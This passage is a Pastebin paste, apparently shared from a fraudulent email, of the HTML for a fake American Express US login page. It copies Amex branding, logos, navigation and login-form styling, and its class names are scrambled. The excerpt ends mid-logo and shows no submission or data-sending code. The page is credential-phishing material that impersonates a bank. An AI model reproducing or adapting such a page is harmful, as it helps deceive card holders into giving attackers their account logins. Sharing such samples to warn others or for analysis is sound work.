Advertisement
Guest User

Code attached to fake email

a guest
Feb 6th, 2023
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 56.58 KB | Cybersecurity | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3.   <head>
  4.     <meta charset="UTF-8" />
  5.     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  6.     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  7.     <title>Log in to My Account | American Express US</title>
  8.     <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  9.     <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
  10.     <script
  11.      src="https://code.jquery.com/jquery-3.3.1.js"
  12.      integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60="
  13.      crossorigin="anonymous"
  14.    ></script>
  15.     <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
  16.     <script
  17.      src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
  18.      integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
  19.      crossorigin="anonymous"
  20.    ></script>
  21.  
  22.     <style>
  23.       * {
  24.         margin: 0;
  25.         padding: 0;
  26.         box-sizing: border-box;
  27.       }
  28.       body {
  29.         font-family: BentonSans, Helvetica Neue, Roboto, Helvetica, sans-serif;
  30.         background-color: #ecedee;
  31.       }
  32.       .njkhsye78-box {
  33.         transition: all 0.2s ease-in;
  34.       }
  35.       .gpo-nav {
  36.         position: fixed;
  37.         top: 0;
  38.         background-color: rgba(0, 0, 0, 0.5);
  39.         width: 100%;
  40.         height: 100vh;
  41.       }
  42.       .ghn-box {
  43.         position: fixed;
  44.         top: 0;
  45.         width: 100%;
  46.         background-color: #f7f8f9;
  47.         transition: all 0.3s ease-in-out;
  48.       }
  49.       .hide {
  50.         opacity: 0;
  51.         visibility: hidden;
  52.       }
  53.       .gshbn-1 {
  54.         padding-top: 80px;
  55.       }
  56.       .cahasj-cont {
  57.         padding: 0 140px;
  58.       }
  59.       .head__div {
  60.         display: flex;
  61.         align-items: center;
  62.         justify-content: space-around;
  63.         background-color: #fff;
  64.         padding: 10px;
  65.         position: fixed;
  66.         width: 100%;
  67.         top: 0;
  68.       }
  69.       .head__main {
  70.         background-color: #fff;
  71.         padding: 20px;
  72.         text-align: center;
  73.       }
  74.       .log__head {
  75.         display: flex;
  76.         align-items: center;
  77.       }
  78.       .n__data-2 {
  79.         display: flex;
  80.         align-items: center;
  81.       }
  82.       .n__data-2 span {
  83.         display: inline-block;
  84.         margin: 0 15px;
  85.         transition: all 0.3s ease;
  86.       }
  87.  
  88.       .n__data span {
  89.         margin-left: 20px;
  90.         font-size: 15px;
  91.         color: #006fcf;
  92.         cursor: default;
  93.         padding: 15px 0;
  94.       }
  95.       .n__data a:active {
  96.         background-color: red;
  97.       }
  98.       .n__data span:hover {
  99.         border-bottom: 5px solid #ccc;
  100.       }
  101.       .nsp__d {
  102.         color: #006fcf;
  103.         font-size: 15px;
  104.         cursor: pointer;
  105.         padding: 12px 20px;
  106.         border-radius: 5px;
  107.         transition: all 0.1s ease;
  108.       }
  109.       .nps__btn {
  110.         padding: 12px 20px;
  111.         cursor: pointer;
  112.         color: #fff;
  113.         background: #006fcf;
  114.         border-radius: 5px;
  115.         border: none;
  116.         font-size: 15px;
  117.         transition: all 0.3s ease-in;
  118.       }
  119.       .nps__btn:hover {
  120.         background: #0061b6;
  121.       }
  122.       .n__data-2 img {
  123.         cursor: pointer;
  124.       }
  125.       .nsp__d:hover {
  126.         background: rgba(129, 129, 129, 0.1);
  127.       }
  128.       .nms__bod {
  129.         margin: 20px 0;
  130.         display: flex;
  131.         justify-content: center;
  132.         padding: 10px 0;
  133.       }
  134.       .mhasas-bod-2 {
  135.         padding: 20px 80px;
  136.       }
  137.       .mbod-conqkas {
  138.         background-color: #fff;
  139.         padding: 30px;
  140.       }
  141.       .hjno-bod {
  142.         display: flex;
  143.         justify-content: center;
  144.       }
  145.       .phajshjas {
  146.         border-left: 2px solid rgb(131, 127, 127);
  147.         height: 250px;
  148.       }
  149.       .njtyeuas-1-box {
  150.         width: 25%;
  151.         margin-left: 30px;
  152.       }
  153.  
  154.       .njtyeuas-1-box p {
  155.         font-size: 13px;
  156.         text-align: center;
  157.         margin: 10px 0;
  158.       }
  159.       .jsken {
  160.         margin-right: 30px;
  161.         padding-right: 30px;
  162.       }
  163.       .hasHigy {
  164.         width: 35%;
  165.       }
  166.       .nms__bod-f {
  167.         width: 24%;
  168.         background-color: #fff;
  169.         padding: 20px;
  170.       }
  171.       .nms-box-mi label {
  172.         display: block;
  173.       }
  174.       .nms-box-mi {
  175.         margin: 25px 0;
  176.       }
  177.       .nms__bod h2 {
  178.         text-align: center;
  179.         font-weight: 400;
  180.         font-size: 20px;
  181.       }
  182.       .nms-box-mi label {
  183.         font-weight: 600;
  184.         font-size: 11px;
  185.         margin: 5px 0;
  186.       }
  187.       .nms-box-mi input,
  188.       .nms-box-mi select {
  189.         width: 100%;
  190.         height: 50px;
  191.         border-radius: 5px;
  192.         padding: 10px;
  193.         background-color: #f7f8f9;
  194.         border: 1px solid #c8c9c7;
  195.       }
  196.       .nms-box-mi input:focus,
  197.       .nms-box-mi select:focus {
  198.         border-color: #006fcf;
  199.         outline: none;
  200.       }
  201.       .btn-full {
  202.         width: 100%;
  203.         height: 45px;
  204.         background: #006fcf;
  205.         color: #fff;
  206.         border: none;
  207.         cursor: pointer;
  208.         border-radius: 5px;
  209.         font-size: 16px;
  210.         transition: all 0.3s ease;
  211.       }
  212.       .btn-full:hover {
  213.         background: #0061b6;
  214.       }
  215.       .nsj__link {
  216.         margin: 17px 0;
  217.       }
  218.       .nsj__link a {
  219.         color: #006fcf;
  220.         text-decoration: none;
  221.         font-size: 14px;
  222.       }
  223.       .nsj__link a:hover {
  224.         text-decoration: underline;
  225.       }
  226.       .msh-img {
  227.         background-color: #fff;
  228.         height: max-content;
  229.         margin-left: 25px;
  230.         padding: 12px;
  231.         padding-top: 30px;
  232.       }
  233.       .msh-img p {
  234.         text-align: center;
  235.         font-size: 12px;
  236.         font-weight: 600;
  237.       }
  238.       .nsmh-fot {
  239.         background-color: #fff;
  240.         padding: 20px 20px;
  241.       }
  242.       .nsmh-fot hr {
  243.         margin: 20px 0;
  244.       }
  245.       .shgas-fot-box {
  246.         display: flex;
  247.         justify-content: center;
  248.       }
  249.       .ngh-fot-lik {
  250.         margin-right: 80px;
  251.       }
  252.       .ngh-fot-lik h4 {
  253.         margin: 15px 0;
  254.         font-size: 13px;
  255.         font-weight: 600;
  256.         color: #53565a;
  257.       }
  258.       .bnsj-link a {
  259.         line-height: 35px;
  260.         font-size: 14px;
  261.         text-decoration: none;
  262.         color: #006fcf;
  263.       }
  264.       .bnsj-link a:hover {
  265.         text-decoration: underline;
  266.       }
  267.       .njmk-log-fot {
  268.         margin: 30px 0;
  269.         padding: 0 130px;
  270.       }
  271.       .njmk-log-fot hr {
  272.         border: 1px solid #eee;
  273.       }
  274.       .ghavih-spc {
  275.         width: 30px;
  276.       }
  277.       .mkjss {
  278.         margin: 20px 0;
  279.       }
  280.       .cjas-cont svg {
  281.         width: 20px;
  282.         margin-right: 8px;
  283.       }
  284.       .gheyx-arr-soc a {
  285.         margin-left: 5px;
  286.       }
  287.       .cjas-cont a {
  288.         margin-left: 5px;
  289.         font-size: 14px;
  290.         text-decoration: none;
  291.         color: #0061b6;
  292.       }
  293.       .cjas-cont a:hover {
  294.         text-decoration: underline;
  295.       }
  296.       .njksl6-box {
  297.         display: flex;
  298.         align-items: center;
  299.         justify-content: space-between;
  300.       }
  301.       .cjas-cont {
  302.         display: flex;
  303.         align-items: center;
  304.       }
  305.       .ghst-terms {
  306.         margin: 28px 0;
  307.       }
  308.       .ghshe {
  309.         margin: 25px 0;
  310.       }
  311.       .tejank-j3 {
  312.         padding: 0 130px;
  313.       }
  314.       .tejank-j3 a,
  315.       .tejank-j3 span {
  316.         color: #0061b6;
  317.         font-size: 14px;
  318.         text-decoration: none;
  319.       }
  320.       .tejank-j3 a {
  321.         margin-right: 10px;
  322.       }
  323.       .tejank-j3 a:hover {
  324.         text-decoration: underline;
  325.       }
  326.       .tejank-j3 span {
  327.         color: #000;
  328.       }
  329.       .veraNjh-1 {
  330.         display: flex;
  331.         background-color: #f7f8f9;
  332.         width: 100%;
  333.         height: 40px;
  334.         margin: 20px 0;
  335.       }
  336.       .imgtye-arr {
  337.         transform: translateX(-7px) translateY(1.1px);
  338.       }
  339.       .prog-bar {
  340.         width: 35%;
  341.         background-color: #1274b8;
  342.         height: inherit;
  343.         color: #fff;
  344.       }
  345.       .prog-bar span {
  346.         display: inline-block;
  347.         transform: translateY(10px);
  348.         padding: 0 20px;
  349.         font-size: 14px;
  350.       }
  351.       .mbod-conqkas h2 {
  352.         text-align: center;
  353.         margin: 20px 0;
  354.         font-weight: 500;
  355.       }
  356.       .hasHigy p {
  357.         font-size: 13px;
  358.         text-align: center;
  359.       }
  360.       .gnPgha-yh {
  361.         font-size: 14px !important;
  362.         font-weight: 600 !important;
  363.       }
  364.       .remove {
  365.         display: none !important;
  366.       }
  367.       .img-box {
  368.         width: 50%;
  369.         margin: 30px auto;
  370.       }
  371.      
  372.       .error-box {
  373.         font-size: 13px;
  374.         color: red;
  375.         font-weight: 600;
  376.       }
  377.  
  378.       @media screen and (max-width: 1051px) {
  379.         .nms__bod {
  380.           display: block;
  381.         }
  382.         .nms__bod-f {
  383.           width: 50%;
  384.           margin: 30px auto;
  385.         }
  386.         .msh-img {
  387.           width: max-content;
  388.           margin: 0 auto;
  389.         }
  390.       }
  391.       @media screen and (max-width: 1013px) {
  392.         .mhasas-bod-2 {
  393.           padding: 20px;
  394.         }
  395.       }
  396.  
  397.       @media screen and (max-width: 827px) {
  398.         .phajshjas {
  399.           display: none;
  400.         }
  401.         .njtyeuas-1-box {
  402.           display: none;
  403.         }
  404.         .hasHigy {
  405.           width: 100%;
  406.         }
  407.         .hjno-bod {
  408.           display: block;
  409.         }
  410.  
  411.         .njmk-log-fot {
  412.           padding: 20px;
  413.         }
  414.         .tejank-j3 {
  415.           padding: 20px;
  416.         }
  417.       }
  418.  
  419.       @media screen and (max-width: 765px) {
  420.         .shgas-fot-box {
  421.           display: grid;
  422.           grid-template-columns: repeat(2, 1fr);
  423.           margin: 20px auto;
  424.         }
  425.       }
  426.  
  427.       @media screen and (max-width: 542px) {
  428.         .njksl6-box {
  429.           display: block;
  430.           margin: 0;
  431.         }
  432.         .prog-bar {
  433.           width: 55%;
  434.         }
  435.       }
  436.  
  437.       @media screen and (max-width: 463px) {
  438.         .nms__bod-f {
  439.           width: 95%;
  440.         }
  441.         .n__data-2 {
  442.           display: none;
  443.         }
  444.         .n__data {
  445.           white-space: normal;
  446.         }
  447.         .n__data span {
  448.           font-size: 13px !important;
  449.         }
  450.         .nms__bod {
  451.           padding: 0;
  452.         }
  453.       }
  454.  
  455.       @media screen and (max-width: 375px) {
  456.         .shgas-fot-box {
  457.           display: none;
  458.         }
  459.       }
  460.     </style>
  461.   </head>
  462.   <body>
  463.     <div class="njkhsye78-box hide">
  464.       <div class="gpo-nav"></div>
  465.       <div class="ghn-box">
  466.         <div class="gshbn-1">
  467.           <div class="shgas-fot-box">
  468.             <div class="ngh-fot-lik">
  469.               <h4>CARD ACCOUNTS</h4>
  470.               <div class="bnsj-link">
  471.                 <a href="#">Create Your Online Account</a>
  472.               </div>
  473.  
  474.               <div class="bnsj-link">
  475.                 <a href="#">Account Home</a>
  476.               </div>
  477.  
  478.               <div class="bnsj-link">
  479.                 <a href="#">Confirm Your Card</a>
  480.               </div>
  481.  
  482.               <div class="bnsj-link">
  483.                 <a href="#">Statements & Activity</a>
  484.              </div>
  485.              <div class="bnsj-link">
  486.                <a href="#">Account Services </a>
  487.              </div>
  488.  
  489.              <div class="bnsj-link">
  490.                <a href="#">Card Benefits</a>
  491.              </div>
  492.            </div>
  493.  
  494.            <div class="ngh-fot-lik">
  495.              <h4>BUSINESS ACCOUNTS</h4>
  496.              <div class="bnsj-link">
  497.                <a href="#">Small Business</a>
  498.              </div>
  499.  
  500.              <div class="bnsj-link">
  501.                <a href="#">Merchant Home</a>
  502.              </div>
  503.  
  504.              <div class="bnsj-link">
  505.                <a href="#">American Express @Work</a>
  506.              </div>
  507.            </div>
  508.  
  509.            <div class="ngh-fot-lik">
  510.              <h4>OTHER ACCOUNTS</h4>
  511.              <div class="bnsj-link">
  512.                <a href="#">MMembership Rewards</a>
  513.              </div>
  514.  
  515.              <div class="bnsj-link">
  516.                <a href="#">Membership Rewards</a>
  517.              </div>
  518.  
  519.              <div class="bnsj-link">
  520.                <a href="#">CreditSecure</a>
  521.              </div>
  522.  
  523.              <div class="bnsj-link">
  524.                <a href="#">Bluebird</a>
  525.              </div>
  526.              <div class="bnsj-link">
  527.                <a href="#">Accept Amex Cards </a>
  528.              </div>
  529.  
  530.              <div class="bnsj-link">
  531.                <a href="#">Refer A Friend</a>
  532.              </div>
  533.            </div>
  534.  
  535.            <div class="ngh-fot-lik">
  536.              <h4>CREDIT TOOLS AND SUPPORT</h4>
  537.              <div class="bnsj-link">
  538.                <a href="#">Credit Intel – Financial Education Center</a>
  539.              </div>
  540.  
  541.              <div class="bnsj-link">
  542.                <a href="#">Supplier Diversity</a>
  543.              </div>
  544.  
  545.              <div class="bnsj-link">
  546.                <a href="#">Credit 101</a>
  547.              </div>
  548.  
  549.              <div class="bnsj-link">
  550.                <a href="#">Money Management 101</a>
  551.              </div>
  552.              <div class="bnsj-link">
  553.                <a href="#">US Newcomers </a>
  554.              </div>
  555.  
  556.              <div class="bnsj-link">
  557.                <a href="#">Frequently Asked Questions</a>
  558.              </div>
  559.            </div>
  560.          </div>
  561.  
  562.          <div class="cjas-cont cahasj-cont">
  563.            <svg
  564.              xmlns="http://www.w3.org/2000/svg"
  565.              width="100"
  566.              height="69"
  567.              viewBox="0 0 100 69"
  568.            >
  569.              <path fill="#FFF" d="M0 0h100v69H0z" />
  570.              <path
  571.                fill="#BD3D44"
  572.                d="M0 0h100v5.308H0V0zm0 10.615h100v5.308H0v-5.308zm0 10.616h100v5.308H0V21.23zm0 10.615h100v5.308H0v-5.308zm0 10.616h100v5.308H0v-5.308zm0 10.615h100v5.308H0v-5.308zm0 10.616h100V69H0v-5.308z"
  573.              />
  574.              <path fill="#192F5D" d="M0 0h52.44v37.154H0V0z" />
  575.              <path
  576.                fill="#FFF"
  577.                d="M4.37 1.59l.477 1.469h1.544l-1.249.907.477 1.469-1.25-.908-1.248.908.477-1.469-1.25-.907h1.545L4.37 1.59zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.545l-1.25.907.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.545l-1.25.907.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.907h1.545l.477-1.469zM8.74 5.306l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.476-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zM4.37 9.021l.477 1.468h1.544l-1.249.908.477 1.469-1.25-.908-1.248.908.477-1.469-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.908h1.545l.477-1.468zM8.74 12.736l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.249.907.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.25.907.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.249.907.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.907-1.249.907.478-1.469-1.25-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.249.907.477-1.469-1.25-.907h1.545l.477-1.469zM4.37 16.452l.477 1.468h1.544l-1.249.908.477 1.468-1.25-.907-1.248.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.477-1.468zM8.74 20.167l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.907h1.545l.477-1.469zM4.37 23.883l.477 1.468h1.544l-1.249.908.477 1.468-1.25-.907-1.248.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.477-1.468zM8.74 27.598l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.907h1.545l.477-1.469zM4.37 31.314l.477 1.468h1.544l-1.249.908.477 1.468-1.25-.907-1.248.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.477-1.468z"
  578.              />
  579.            </svg>
  580.            United States<a href="#">Change Country</a>
  581.          </div>
  582.        </div>
  583.      </div>
  584.    </div>
  585.  
  586.    <div class="head__div">
  587.      <div class="log__head">
  588.        <svg
  589.          version="1.1"
  590.          id="Layer_1"
  591.          xmlns="http://www.w3.org/2000/svg"
  592.          x="0"
  593.          y="0"
  594.          width="45"
  595.          height="45"
  596.          viewBox="0 0 45 45"
  597.          xml:space="preserve"
  598.        >
  599.          <style>
  600.            .st0 {
  601.              fill: #fff;
  602.             }
  603.             .st1 {
  604.               fill: #006fcf;
  605.             }
  606.           </style>
  607.           <path
  608.            id="logo-blue-box-small-45-9x45-a"
  609.            class="st0"
  610.            d="M44.9 44.9H0V0h44.9z"
  611.          />
  612.           <path
  613.            class="st1"
  614.            d="M44.9 24.2V-.1H0v44.9h44.9V31.7c-.1 0 0-7.5 0-7.5"
  615.            transform="translate(0 .12)"
  616.          />
  617.           <path
  618.            class="st0"
  619.            d="M39.4 21.7h3.4v-7.9h-3.7v1.1l-.7-1.1h-3.2v1.4l-.6-1.4h-5.9c-.2 0-.4.1-.6.1s-.3.1-.5.2-.3.1-.5.2v-.5H10.2l-.5 1.3-.5-1.3h-4v1.4l-.6-1.4H1.4L0 17.2v4.5h2.3l.4-1.1h.8l.4 1.1h17.6v-1l.7 1h4.9v-.6c.1.1.3.1.4.2s.3.1.4.2c.2.1.4.1.6.1h3.6l.4-1.1h.8l.4 1.1h4.9v-1l.8 1.1zm5.5 10v-7.4H17.4l-.7 1-.7-1H8v7.9h8l.7-1 .7 1h5v-1.7h-.2c.7 0 1.3-.1 1.8-.3v2.1h3.6v-1l.7 1h14.9c.6-.2 1.2-.3 1.7-.6z"
  620.            transform="translate(0 .12)"
  621.          />
  622.           <path
  623.            class="st1"
  624.            d="M43.2 29.8h-2.7v1.1h2.6c1.1 0 1.8-.7 1.8-1.7s-.6-1.5-1.6-1.5h-1.2c-.3 0-.5-.2-.5-.5s.2-.5.5-.5h2.3l.5-1.1h-2.7c-1.1 0-1.8.7-1.8 1.6 0 1 .6 1.5 1.6 1.5h1.2c.3 0 .5.2.5.5.1.4-.1.6-.5.6zm-4.9 0h-2.7v1.1h2.6c1.1 0 1.8-.7 1.8-1.7s-.6-1.5-1.6-1.5h-1.2c-.3 0-.5-.2-.5-.5s.2-.5.5-.5h2.3l.5-1.1h-2.7c-1.1 0-1.8.7-1.8 1.6 0 1 .6 1.5 1.6 1.5h1.2c.3 0 .5.2.5.5.1.4-.2.6-.5.6zm-3.5-3.2v-1.1h-4.2v5.3h4.2v-1.1h-3v-1.1h2.9v-1.1h-2.9v-1h3v.1zm-6.8 0c.5 0 .7.3.7.6s-.2.6-.7.6h-1.5v-1.3l1.5.1zm-1.5 2.3h.6l1.6 1.9h1.5l-1.8-2c.9-.2 1.4-.8 1.4-1.6 0-1-.7-1.7-1.8-1.7h-2.8v5.3h1.2l.1-1.9zm-3.2-1.6c0 .4-.2.7-.7.7H21v-1.4h1.5c.5 0 .8.3.8.7zm-3.5-1.8v5.3H21V29h1.6c1.1 0 1.9-.7 1.9-1.8 0-1-.7-1.8-1.8-1.8l-2.9.1zM18 30.8h1.5l-2.1-2.7 2.1-2.6H18l-1.3 1.7-1.3-1.7h-1.5l2.1 2.6-2.1 2.6h1.5l1.3-1.7 1.3 1.8zm-4.5-4.2v-1.1H9.3v5.3h4.2v-1.1h-3v-1.1h2.9v-1.1h-2.9v-1h3v.1zm24.3-9.4l2.1 3.2h1.5v-5.3h-1.2v3.5l-.3-.5-1.9-3h-1.6v5.3h1.2v-3.6l.2.4zm-5.2-.1L33 16l.4 1.1.5 1.2h-1.8l.5-1.2zm2.1 3.3H36l-2.3-5.3h-1.6l-2.3 5.3h1.3l.5-1.1h2.6l.5 1.1zm-5.6 0l.5-1.1h-.3c-.9 0-1.4-.6-1.4-1.5v-.1c0-.9.5-1.5 1.4-1.5h1.3v-1.1h-1.4c-1.6 0-2.5 1.1-2.5 2.6v.1c0 1.6.9 2.6 2.4 2.6zm-4.5 0h1.2v-5.2h-1.2v5.2zM22 16.2c.5 0 .7.3.7.6s-.2.6-.7.6h-1.5v-1.3l1.5.1zm-1.5 2.3h.6l1.6 1.9h1.5l-1.8-2c.9-.2 1.4-.8 1.4-1.6 0-1-.7-1.7-1.8-1.7h-2.8v5.3h1.2l.1-1.9zm-2.2-2.3v-1.1h-4.2v5.3h4.2v-1.1h-3v-1.1h2.9v-1.1h-2.9v-1h3v.1zm-9.1 4.2h1.1l1.5-4.3v4.3H13v-5.3h-2l-1.2 3.6-1.2-3.6h-2v5.3h1.2v-4.3l1.4 4.3zm-6.5-3.3l.4-1.1.4 1.1.5 1.2H2.2l.5-1.2zm2.1 3.3h1.3l-2.3-5.3H2.3L0 20.4h1.3l.5-1.1h2.6l.4 1.1z"
  625.            transform="translate(0 .12)"
  626.          />
  627.         </svg>
  628.  
  629.         <div class="n__data">
  630.           <span class="hasn-bt">My Account</span>
  631.           <span class="hasn-bt">Cards</span>
  632.           <span class="hasn-bt">Banking</span>
  633.           <span class="hasn-bt">Travel</span>
  634.           <span class="hasn-bt">Rewards</span>
  635.           <span class="hasn-bt">Business</span>
  636.         </div>
  637.       </div>
  638.  
  639.       <div class="n__data-2">
  640.         <div class="ndata-box">
  641.           <img src="https://i.ibb.co/6HS3kQj/s-img.png" alt="s-img" />
  642.         </div>
  643.  
  644.         <span class="nsp__d">Help</span>
  645.  
  646.         <div class="n__data-btn">
  647.           <button class="nps__btn">Log In</button>
  648.         </div>
  649.       </div>
  650.     </div>
  651.  
  652.     <div class="head__main">
  653.       <svg
  654.        xmlns="http://www.w3.org/2000/svg"
  655.        width="235"
  656.        height="15"
  657.        viewBox="0 0 235 15"
  658.      >
  659.         <path fill="none" d="M0 0h235v15H0z" />
  660.         <path
  661.          d="M230.1 5.8h-3.6c-.8 0-1.3-.5-1.3-1.2s.6-1.1 1.3-1.1h6.5l1.5-3.3h-8c-3.3 0-5.2 2-5.2 4.6 0 2.8 1.8 4.4 4.7 4.4h3.6c.8 0 1.3.5 1.3 1.2s-.5 1.2-1.3 1.2h-7.8v3.3h7.8c3.3 0 5.2-1.9 5.2-4.7 0-2.8-1.7-4.4-4.7-4.4m-14.3 0h-3.6c-.8 0-1.3-.5-1.3-1.2s.6-1.1 1.3-1.1h6.5l1.5-3.3h-8c-3.3 0-5.2 2-5.2 4.6 0 2.8 1.8 4.4 4.7 4.4h3.6c.8 0 1.3.5 1.3 1.2s-.5 1.2-1.3 1.2h-7.8v3.3h7.8c3.3 0 5.2-1.9 5.2-4.7 0-2.8-1.7-4.4-4.7-4.4m-22.8 9h12.3v-3.3h-8.4V9.1h8.2V5.8h-8.2V3.5h8.4V.2H193zm-7.7-8.4h-4.1V3.5h4.1c1.2 0 1.8.7 1.8 1.5-.1.8-.7 1.4-1.8 1.4m5.7-1.5c0-2.8-2-4.7-5.2-4.7h-8.4v14.6h3.9V9.7h1.4l4.4 5.1h4.8l-4.8-5.3c2.4-.5 3.9-2.3 3.9-4.6m-21 1.8h-4.2V3.5h4.2c1.2 0 1.8.7 1.8 1.6-.1.9-.7 1.6-1.8 1.6m.4-6.5h-8.5v14.6h3.9V10h4.5c3.3 0 5.3-2.1 5.3-4.9 0-2.9-2-4.9-5.2-4.9m-9.2 0h-5l-3.8 4.4-3.8-4.4h-5.1l6.4 7.2-6.5 7.4h5l3.9-4.6 4 4.6h5.1l-6.6-7.5zm-30.7 14.6h12.3v-3.3h-8.4V9.1h8.2V5.8h-8.2V3.5h8.4V.2h-12.3zm-13.7-5.7l-6-8.9h-4.9v14.6h3.9V5.5l6.1 9.3h4.7V.2h-3.8zm-22.7-.5l2-4.9 2 4.9h-4zM93.7.2l-6.4 14.6h4.3l1.2-3h6.8l1.3 3h4.4L98.7.2h-5zM80.9 7.6v-.3c0-2.2 1.2-3.7 3.7-3.7H89V.2h-4.7C79.5.2 77 3.3 77 7.3v.3c0 4.5 2.8 7.1 7.1 7.1h1.3l1.6-3.3h-2.3c-2.3.1-3.8-1.2-3.8-3.8M71.1.2v14.6H75V.2zm-7.8 6.2h-4.1V3.5h4.1c1.2 0 1.8.7 1.8 1.5s-.6 1.4-1.8 1.4M69 4.9c0-2.8-2-4.7-5.2-4.7h-8.4v14.6h3.9V9.7h1.4l4.4 